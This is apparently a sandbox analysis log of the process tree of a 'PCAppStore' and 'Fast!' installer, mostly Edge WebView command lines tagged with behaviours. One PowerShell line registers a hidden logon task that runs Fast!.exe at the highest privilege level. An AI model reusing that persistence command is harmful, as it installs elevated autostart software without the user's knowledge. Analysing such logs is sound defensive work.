C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3644,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=3672 /prefetch:16⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1328
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=4252,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:16⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6584
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=4432,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4444 /prefetch:16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6704
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=4660,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4688 /prefetch:16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5984
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=4704,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4724 /prefetch:16⤵
- Checks computer location settings
- Executes dropped EXE
PID:4608
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=2208,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4708 /prefetch:86⤵
- Executes dropped EXE
PID:3596
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4384,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:86⤵
- Executes dropped EXE
PID:2172
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4396,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:86⤵
- Executes dropped EXE
PID:348
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5228,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:86⤵
- Executes dropped EXE
PID:396
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5336,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=5344 /prefetch:86⤵
- Executes dropped EXE
PID:5420
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5524,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:86⤵
- Executes dropped EXE
PID:6588
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=5600,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:86⤵
- Executes dropped EXE
PID:1220
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=renderer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=5572,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:16⤵
- Executes dropped EXE
PID:7008
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4648,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:86⤵
- Executes dropped EXE
PID:4608
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1216,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:86⤵
- Executes dropped EXE
PID:1988
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1920,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:26⤵PID:2448
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\PCAppStore\UserData\EBWebView" --webview-exe-name=PcAppStore.exe --webview-exe-version=1.0.0.2001g --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=3756,i,12312002296146883366,4900365008770011898,262144 --variations-seed-version --mojo-platform-channel-handle=3828 /prefetch:26⤵PID:6504
-
-
-
C:\Users\Admin\PCAppStore\download\SetupEngine.exe"C:\Users\Admin\PCAppStore\download\SetupEngine.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2988 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://veryfast.io/installing.html?guid=4FC725D8-4F7D-4884-B878-08BB0CE6C800X&_fcid=6⤵PID:3932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8bf1c46f8,0x7ff8bf1c4708,0x7ff8bf1c47187⤵PID:5576
-
-
-
C:\Users\Admin\AppData\Local\FAST!\Temp\SetupEngine.exe"C:\Users\Admin\AppData\Local\FAST!\Temp\SetupEngine.exe" /fcid /instdir C:\Program Files (x86)\Fast! /startup 16⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:7148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Register-ScheduledTask fast_task -InputObject (New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files (x86)\Fast!\fast!.exe') -Principal (New-ScheduledTaskPrincipal -UserId ($Env:UserDomain + '\' + $Env:UserName) -RunLevel Highest) -Trigger (New-ScheduledTaskTrigger -AtLogon) -Settings (New-ScheduledTaskSettingsSet -MultipleInstances Queue -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5136
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\FAST!\Temp\diskspd.exe -c100M -b4K -t1 -r -o32 -d10 -ag -h -Rxml C:\Users\Admin\AppData\Local\FAST!\Temp\testfile.temp" > C:\Users\Admin\AppData\Local\FAST!\Temp\dskres.xml7⤵
- System Location Discovery: System Language Discovery
PID:3656 -
C:\Users\Admin\AppData\Local\FAST!\Temp\diskspd.exeC:\Users\Admin\AppData\Local\FAST!\Temp\diskspd.exe -c100M -b4K -t1 -r -o32 -d10 -ag -h -Rxml C:\Users\Admin\AppData\Local\FAST!\Temp\testfile.temp8⤵
- Executes dropped EXE
PID:5564
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://veryfast.io/installed.php?guid=4FC725D8-4F7D-4884-B878-08BB0CE6C800X&_fcid=7⤵PID:3636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8bf1c46f8,0x7ff8bf1c4708,0x7ff8bf1c47188⤵PID:1256
-
-
-
C:\Program Files (x86)\Fast!\Fast!.exe"C:\Program Files (x86)\Fast!\Fast!.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:112
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://pcapp.store/account/login?guid=4FC725D8-4F7D-4884-B878-08BB0CE6C800X5⤵PID:5464
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8bf1c46f8,0x7ff8bf1c4708,0x7ff8bf1c47186⤵PID:3100
-
-
-
-
C:\Users\Admin\PCAppStore\Watchdog.exe"C:\Users\Admin\PCAppStore\Watchdog.exe" /guid=4FC725D8-4F7D-4884-B878-08BB0CE6C800X /rid=20241204140523.755240879578 /ver=fa.2001g4⤵
- Executes dropped EXE
PID:5324
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:12⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:82⤵PID:4704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7592 /prefetch:12⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:12⤵PID:5744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:12⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:12⤵PID:3600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:12⤵PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:12⤵PID:2580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:12⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:12⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:12⤵PID:2996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:12⤵PID:7008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:12⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7420 /prefetch:12⤵PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5864 /prefetch:82⤵PID:5876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:12⤵PID:7032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:6912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:12⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:12⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7900 /prefetch:12⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:12⤵PID:6884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:12⤵PID:2904
-
-
